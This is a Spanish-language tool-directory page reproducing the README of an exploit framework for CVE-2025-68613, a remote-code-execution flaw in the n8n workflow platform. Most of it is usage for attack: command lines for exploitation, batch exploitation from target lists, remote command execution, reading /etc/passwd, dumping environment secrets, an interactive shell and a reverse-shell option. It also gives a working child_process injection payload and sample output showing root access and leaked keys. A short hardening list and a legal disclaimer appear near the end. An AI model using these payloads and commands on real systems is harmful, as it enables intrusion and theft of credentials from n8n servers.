Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
n8n-exploit-CVE-2025-68613-n8n-God-Mode-Ultimate — n8n God Mode Ultimate - CVE-2025-68613 Escáner v1.0.0 ║ ║ Ejecución Remota de Código en Automatización de Flujos de Trabajo | Kitploit
Herramientas/GitHubGitHub/hackersatyamrastogi/n8n-exploit-cve-2025-68613-n8n-god-mode-ultimate
Escáneres de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebRecopilación de InformaciónPost-ExplotaciónPruebas de PenetraciónComando y ControlAprendizaje y EducaciónRed Teaming
Herramienta de Acceso Remoto
Desarrollo de Payloads
GitHubhackersatyamrastogi/n8n-exploit-cve-2025-68613-n8n-god-mode-ultimate

n8n-exploit-CVE-2025-68613-n8n-God-Mode-Ultimate

n8n God Mode Ultimate - CVE-2025-68613 Escáner v1.0.0 ║ ║ Ejecución Remota de Código en Automatización de Flujos de Trabajo

Ver Repositorio
532hace 8 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

n8n God Mode Ultimate - Escáner y Framework de Explotación de CVE-2025-68613

n8n God Mode Ultimate

Herramienta avanzada de escaneo y explotación RCE para la automatización de workflows de n8n

Python Version License CVE CVSS Score


🎯 Descripción general

n8n God Mode Ultimate es un framework integral de pruebas de seguridad diseñado para detectar y validar CVE-2025-68613 en plataformas de automatización de workflows de n8n. Esta vulnerabilidad crítica de Ejecución Remota de Código (RCE) afecta a las versiones de n8n mediante la inyección de expresiones en los contextos de ejecución de workflows.

Detalles de CVE-2025-68613

  • Puntuación CVSS: 10.0 (Crítico)
  • Vector de ataque: Red
  • Complejidad del ataque: Baja
  • Privilegios requeridos: Bajos (credenciales válidas)
  • Interacción del usuario: Ninguna
  • Tipo de vulnerabilidad: Inyección de expresiones → Ejecución Remota de Código

Versiones afectadas:

  • n8n >= 0.211.0 y < 1.120.4
  • n8n >= 1.121.0 y < 1.121.1

Versiones parcheadas:

  • n8n >= 1.120.4
  • n8n >= 1.121.1
  • n8n >= 1.122.0

✨ Características

🔍 Detección y escaneo

  • Detección inteligente de versiones - Extrae la versión de n8n de los metadatos de la página de inicio de sesión
  • Escaneo por lotes - Escaneo concurrente de objetivos multihilo con seguimiento de progreso
  • Múltiples modos de escaneo:
    • --detect - Solo detección de versión (el más rápido, no intrusivo)
    • --safe - Verificación segura de vulnerabilidad sin explotación
    • --poc - Validación de prueba de concepto de RCE
    • --exploit - Modo de explotación completo

💣 Capacidades de explotación

  • 4 técnicas de explotación:
    1. Disparador programado - Workflow de ejecución automática (el más fiable)
    2. Disparador webhook - Ejecución activada por HTTP
    3. Nodo de código - Acceso directo a child_process
    4. Inyección de expresiones - Ejecución manual de expresiones

🎮 Características de God Mode

  • Shell interactivo - Shell remoto completo con historial de comandos
  • Operaciones de archivos:
    • read <file> - Lee archivos remotos
    • write <file> <content> - Escribe archivos en el objetivo
  • Extracción de entorno - Volcado de todas las variables de entorno
  • Información del sistema - Detalles del SO, configuración de red e información de procesos
  • Shell inversa - Generación opcional de payloads de shell inversa
  • Historial de comandos - Seguimiento de historial integrado

📊 Capacidades avanzadas

  • Enumeración de credenciales - Extrae las credenciales almacenadas vía API
  • Volcado de workflows - Exporta todos los workflows con metadatos
  • Extracción de configuración - Volcado completo de la configuración del sistema
  • Enumeración de usuarios - Lista todos los usuarios de n8n
  • Análisis de registros de ejecución - Analiza las salidas de los comandos de las ejecuciones de workflows
  • Limpieza automatizada - Eliminación opcional de workflows después de la ejecución

🚀 Instalación

Requisitos previos

root@kitploit:~
# Python 3.8 or higher
python3 --version

# pip package manager
pip3 --version

Instalar dependencias

root@kitploit:~
# Clone the repository
git clone https://github.com/hackersatyamrastogi/n8n-exploit-CVE-2025-68613-n8n-God-Mode-Ultimate.git
cd n8n-exploit-CVE-2025-68613-n8n-God-Mode-Ultimate

# Install required packages
pip3 install -r requirements.txt

Requisitos

root@kitploit:~
requests>=2.31.0
urllib3>=2.0.0
tqdm>=4.66.0
colorama>=0.4.6

📖 Uso

Uso básico

root@kitploit:~
# Display help menu
python3 n8n-godmode-ultimate.py -h

# Detect n8n version (non-intrusive)
python3 n8n-godmode-ultimate.py -u http://target:5678 --detect

# Safe vulnerability check
python3 n8n-godmode-ultimate.py -u http://target:5678 --safe -e [email protected] -p password

# Proof-of-concept RCE
python3 n8n-godmode-ultimate.py -u http://target:5678 --poc -e [email protected] -p password

# Full exploitation
python3 n8n-godmode-ultimate.py -u http://target:5678 --exploit -e [email protected] -p password

Operaciones de God Mode

root@kitploit:~
# Execute single command
python3 n8n-godmode-ultimate.py --god -u http://target:5678 \
  -e [email protected] -p password --cmd "whoami"

# Read remote file
python3 n8n-godmode-ultimate.py --god -u http://target:5678 \
  -e [email protected] -p password --read-file "/etc/passwd"

# Write remote file
python3 n8n-godmode-ultimate.py --god -u http://target:5678 \
  -e [email protected] -p password --write-file "/tmp/test.txt" --content "payload"

# Extract environment variables
python3 n8n-godmode-ultimate.py --god -u http://target:5678 \
  -e [email protected] -p password --dump-env

# Interactive shell
python3 n8n-godmode-ultimate.py --god -u http://target:5678 \
  -e [email protected] -p password --shell

Escaneo por lotes

root@kitploit:~
# Scan multiple targets from file
python3 n8n-godmode-ultimate.py -l targets.txt --detect -t 20

# Batch exploitation
python3 n8n-godmode-ultimate.py -l targets.txt --poc -e [email protected] -p password -t 10

Formato de targets.txt:

root@kitploit:~
http://target1:5678
https://target2.example.com
http://192.168.1.100:5678
https://n8n.example.org

Comandos del shell interactivo

Una vez en modo shell (--shell):

root@kitploit:~
n8n> whoami              # Execute command
n8n> read /etc/passwd    # Read file
n8n> env                 # Show environment variables
n8n> info                # System information
n8n> history             # Command history
n8n> exit                # Exit shell

🛠️ Opciones de línea de comandos

Opciones de objetivo

root@kitploit:~
-u, --url URL             URL de n8n objetivo
-l, --list FILE           Archivo que contiene las URLs de los objetivos
-t, --threads NUM         Número de hilos para el escaneo por lotes (por defecto: 10)

Autenticación

root@kitploit:~
-e, --email EMAIL         Correo electrónico del usuario de n8n
-p, --password PASS       Contraseña del usuario de n8n

Modos de escaneo

root@kitploit:~
--detect                  Solo detección de versión (el más rápido)
--safe                    Verificación segura sin explotación
--poc                     Prueba de concepto de RCE
--exploit                 Modo de explotación completo

God Mode

root@kitploit:~
--god                     Activa el modo God Mode
--cmd COMMAND             Ejecuta un solo comando
--read-file PATH          Lee un archivo remoto
--write-file PATH         Escribe un archivo remoto
--content DATA            Contenido para la operación de escritura
--dump-env                Extrae todas las variables de entorno
--shell                   Modo shell interactivo
--revshell HOST:PORT      Payload de shell inversa

Opciones de explotación

root@kitploit:~
--mode MODE               Modo de explotación: schedule|webhook|code|expression (por defecto: schedule)
--timeout SEC             Tiempo de espera del comando en segundos (por defecto: 30)
--cleanup                 Elimina los workflows después de la ejecución
-k, --insecure           Desactiva la verificación SSL
-v, --verbose            Salida verbosa
-q, --quiet              Salida mínima

🔬 Detalles técnicos

Metodología de explotación

1. Disparador programado (Recomendado)

Crea un workflow con un disparador programado que se ejecuta automáticamente cada 3 segundos. Es el método más fiable.

root@kitploit:~
Payload: {{(function(){
  return this.process.mainModule.require('child_process')
    .execSync('whoami').toString()
})()}}

2. Disparador webhook

Crea un endpoint webhook HTTP que ejecuta comandos cuando se activa.

3. Nodo de código

Inyecta código directamente en un nodo de código con acceso a child_process.

4. Inyección de expresiones

Ejecución manual a través del sistema de evaluación de expresiones de n8n.

Detección de versiones

Extrae la versión de la configuración de Sentry codificada en base64 de la página de inicio de sesión:

root@kitploit:~
<meta name="n8n:config:sentry" content="eyJ2ZXJzaW9uIjoi..." />

Endpoints de API utilizados

  • /rest/login - Autenticación
  • /rest/workflows - Operaciones CRUD de workflows
  • /rest/credentials - Enumeración de credenciales
  • /rest/executions - Recuperación de registros de ejecución
  • /rest/users - Enumeración de usuarios
  • /rest/settings - Configuración del sistema

📊 Ejemplos de salida

Detección de versiones

root@kitploit:~
[*] n8n God Mode Ultimate v1.0.0
[*] Target: https://target.example.com
[✓] n8n Version: 1.36.1
[!] Status: VULNERABLE (< 1.120.4)

Prueba de concepto de RCE

root@kitploit:~
[*] Authentication successful
[*] Creating exploitation workflow...
[*] Workflow ID: hd6LxSY765WBThqd
[*] Executing command: whoami
[✓] Command executed successfully!
[+] Output: root

Shell interactivo

root@kitploit:~
n8n> whoami
[+] root

n8n> read /etc/hostname
[+] n8n-production-server

n8n> env
[+] Environment Variables:
N8N_ENCRYPTION_KEY=a1b2c3d4e5f6...
DATABASE_HOST=postgres.internal
AWS_ACCESS_KEY_ID=AKIA...

🛡️ Medidas defensivas

Acciones inmediatas

  1. Actualiza a la versión parcheada (>= 1.120.4 o >= 1.121.1)
  2. Desactiva las credenciales predeterminadas ([email protected]:admin)
  3. Implementa autenticación sólida (se recomienda MFA)
  4. Segmentación de red - Restringe el acceso a la instancia de n8n
  5. Audita los workflows - Revisa todos los workflows activos
  6. Supervisa los registros de ejecución - Comprueba si hay actividad sospechosa

Endurecimiento a largo plazo

  • Activa el registro de auditoría
  • Implementa listas blancas de IP
  • Usa autenticación OAuth/SSO
  • Evaluaciones de seguridad periódicas
  • Mantén n8n actualizado
  • Cifrado de la base de datos en reposo
  • Almacenamiento seguro de credenciales
  • Monitoreo del tráfico de red

⚠️ Aviso legal

SOLO PARA PRUEBAS DE SEGURIDAD AUTORIZADAS

Esta herramienta se proporciona con fines educativos y para pruebas de seguridad autorizadas. Los usuarios deben cumplir con todas las leyes y regulaciones aplicables.

⚖️ Requisitos legales

DEBES:

  • ✅ Obtener autorización por escrito antes de realizar pruebas
  • ✅ Usarla solo en sistemas que poseas o para los que tengas permiso de pruebas
  • ✅ Cumplir con las prácticas de divulgación responsable
  • ✅ Cumplir con las leyes y regulaciones aplicables
  • ✅ Usarla con fines de seguridad defensiva

NO DEBES:

  • ❌ Probar sistemas sin permiso explícito
  • ❌ Usarla con fines maliciosos
  • ❌ Realizar ataques de denegación de servicio
  • ❌ Exfiltrar o modificar datos sin autorización
  • ❌ Desplegarla en sistemas de producción sin consentimiento

📜 Responsabilidad

El autor NO asume ninguna responsabilidad por el mal uso de esta herramienta. El acceso no autorizado a sistemas informáticos es ilegal según:

  • Computer Fraud and Abuse Act (CFAA) - EE. UU.
  • Computer Misuse Act - Reino Unido
  • Directiva sobre Ciberdelincuencia de la UE
  • Legislación similar en todo el mundo

Úsala bajo tu propio riesgo. Eres responsable de tus acciones.


🤝 Contribuciones

¡Las contribuciones son bienvenidas! Sigue estas pautas:

  1. Haz un fork del repositorio
  2. Crea una rama de funcionalidad (git checkout -b feature/improvement)
  3. Haz commit de tus cambios (git commit -am 'Add new feature')
  4. Sube los cambios a la rama (git push origin feature/improvement)
  5. Crea un Pull Request

Código de conducta

  • Sigue las prácticas de divulgación responsable
  • Documenta las características de seguridad con claridad
  • Incluye un manejo de errores adecuado
  • Añade comentarios para la lógica compleja
  • Prueba a fondo antes de enviar

📚 Referencias

Información de CVE

  • CVE-2025-68613 - NVD
  • Avisos de seguridad de n8n

Documentación de n8n

  • Documentación oficial de n8n
  • Referencia de la API de n8n
  • Mejores prácticas de seguridad de n8n

Investigación de seguridad

  • Vulnerabilidades de inyección de expresiones
  • Seguridad en la automatización de workflows

👨‍💻 Autor

Satyam Rastogi

  • GitHub: @hackersatyamrastogi
  • Sitio web: https://www.satyamrastogi.com
  • Twitter: @hackersatyamrastogi

📄 Licencia

Este proyecto está licenciado bajo la Licencia MIT; consulta el archivo LICENSE para más detalles.

root@kitploit:~
MIT License

Copyright (c) 2025 Satyam Rastogi

Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:

The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.

THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.

🌟 Agradecimientos

  • Al equipo de n8n por crear una plataforma increíble de automatización de workflows
  • A los investigadores de seguridad de la comunidad de n8n
  • A las herramientas de seguridad de código abierto que inspiraron este proyecto

📞 Soporte

Para problemas de seguridad, repórtalos de forma responsable:

  • Problemas de seguridad: Abre un aviso de seguridad privado
  • Informes de errores: Usa GitHub Issues
  • Solicitudes de funciones: Abre un debate en GitHub

⭐ ¡Dale una estrella a este repositorio si te resultó útil!

Hecho con 💻 por investigadores de seguridad, para investigadores de seguridad

Descargar herramienta